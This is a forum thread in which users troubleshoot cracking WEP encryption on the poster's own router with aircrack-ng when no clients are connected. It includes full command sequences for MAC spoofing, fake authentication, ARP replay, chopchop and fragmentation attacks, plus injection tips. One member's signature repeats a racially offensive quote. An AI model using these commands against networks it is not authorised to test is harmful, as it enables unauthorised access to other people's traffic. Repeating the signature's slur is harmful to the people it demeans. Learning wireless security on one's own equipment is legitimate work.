Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: wep crack with no clients

  1. #1
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6

    Default wep crack with no clients

    Im following a tutorial to try and crack my new router, all my hardware is compatiable as I cracked my old router with the same hardware. Below is the code I have used so far-

    Code:
    airmon-ng stop ath0
    ifconfig down wifi0
    macchanger --mac 00:11:22:33:44:55 wifi0
    airmon-ng start ath0
    
    airodump-ng -c 8 -w network.out --bssid 00:0F:B5:78:EC:B6 ath0
    //shows AP just fine with adequate power level
    aireplay-ng -1 0 -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55  ath0
    //says authentication is succesfull, as on tutorial
    aireplay-ng -3 -b 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0
    After i enter the last line of the code, the #data and packet columns i think should start to rapidly increase but they dont increae at all.

    Also in aireplay-ng the arp requests should start to increase but they seem to stay the same eg
    Code:
    Read 839 packets (got 0 ARP requests), sent 0 packets...(322 pps)
    wireless card WG311t
    router belkin54g

    any ideas

    Thanks in advance

  2. #2
    Junior Member imported_Timmay's Avatar
    Join Date
    Sep 2008
    Posts
    30

    Default

    When I was trying to crack my own WEP I ran into the same problem. It seems as though even though I was connected, there wasn't any activity. So since you're cracking your own WEP, go to another computer that is connected wirelessly (is that a word?) to the same network and go to any web page while aireplay-ng is going. As soon as I went to Google, or tried to check my mail, the packet request and sent - started.

  3. #3
    Junior Member
    Join Date
    Nov 2007
    Posts
    70

    Default

    @spurl:

    try the korek chopchop attack:

    aireplay-ng -4..............

  4. #4
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6

    Default

    @Timmay - I want to try and to a clientless attack as I have never got it to work before

    @St3f@n - I have tried following the tutorial on the actuall aircrack site

    hxxp://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

    but when i enter this command
    Code:
    aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
    or
    Code:
    aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
    it never asks me if i want to use the packet or not, I have left it running for hours?

    anyone recommend any other good tutorials for clientless wep attack or any ideas where I am goign wrong??

    Cheers

  5. #5
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6

    Default

    also i quoted below this line
    Code:
    Read 839 packets (got 0 ARP requests), sent 0 packets...(322 pps)
    it should actually be this

    Code:
    Read 839 packets (got 0 ARP requests), sent 0 packets...(0 pps)
    does this mean my card is not injecting properly?? even though it should (netgear Wg311t)??

  6. #6
    Member m1cha3l's Avatar
    Join Date
    May 2008
    Posts
    208

    Default

    if you look further down the tutorial you mentioned there is another approach.

    Code:
    aireplay-ng -2 -p 0841 -d ff:ff:ff:ff:ff:ff -a "$MAC" -h "$SOURCE" ath0
    let me know if it works
    "At least black people knew when they where slaves" Doug stanhope

  7. #7
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6

    Default

    Michael I will try your suggestion tongiht when I get home, thanks

    Could this be a driver problem by any chance, will reinstalling the madwifi drivers and aircrack suite do any good?? I say thing because i started up spoonwep and I had excatly the same problem?

  8. #8
    Member m1cha3l's Avatar
    Join Date
    May 2008
    Posts
    208

    Default

    it shouldn't be a driver problem as far as i am aware.

    but i'm not too sure.

    couldn't see how re-installing could help as linux is not windows and those type of things rarely help i have found.
    "At least black people knew when they where slaves" Doug stanhope

  9. #9
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default

    Your probably failing on your authentication. "-1"

    Try reading more about the authentication techniques that you can use.

  10. #10
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    17

    Default clientless attack

    The attack you are doing is an arp request replay attack... for you to pickup an arp request out of the air, something has to happen...

    either a client on the network has to send an arp request. Or you can force an arp request by pinging a non existant IP address on your network, try pinging an invalid IP and you should get an ARP.

    also when your doing fake authentication

    aireplay-ng -1 0 -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0

    that only associates you, but does not KEEP you associated...

    you should do

    aireplay-ng -1 6000 -o 1 -p 10 -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0

    the '-1 6000' means every six thousand seconds do another fake authentication, the '-o 1' means only send 1 packet at a time, the '-p 10' means every 10 seconds send a keep alive packet (this is the important one, it keeps you associated with the access point)

    Without sending the keep alive packets, you'd have to continually re-associate with the client by sending the command again. How do you know when your not associated? when packet injection stops working

    IF THERE IS a client though, you should just use their mac address as the -h parameter so fake auth is not required! (its listed as STATION)

    and as someone suggested, once associated try the interactive packet replay attack

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0

    I've had more luck with that command...

    also I've found that if I lower the rate, I get much more consistent success!

    try

    iwconfig ath0 rate 1M (yes the M has to be capital)

    also I do

    iwpriv ath0 rfmontx 1 (enable injection if it isn't already enabled)

    iwpriv ath0 forceprism 1 (its for more accurate PWR output reading i think)

    except my interface is not called 'ath0' but you get the idea...

    you should check out this page for reference:
    w w w . aircrack-ng.org/doku.php?id=aireplay-ng&DokuWiki=ce5760523d62cad3df2c75e2f378bc84

    and other aircrack-ng pages! they have helped me out!

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •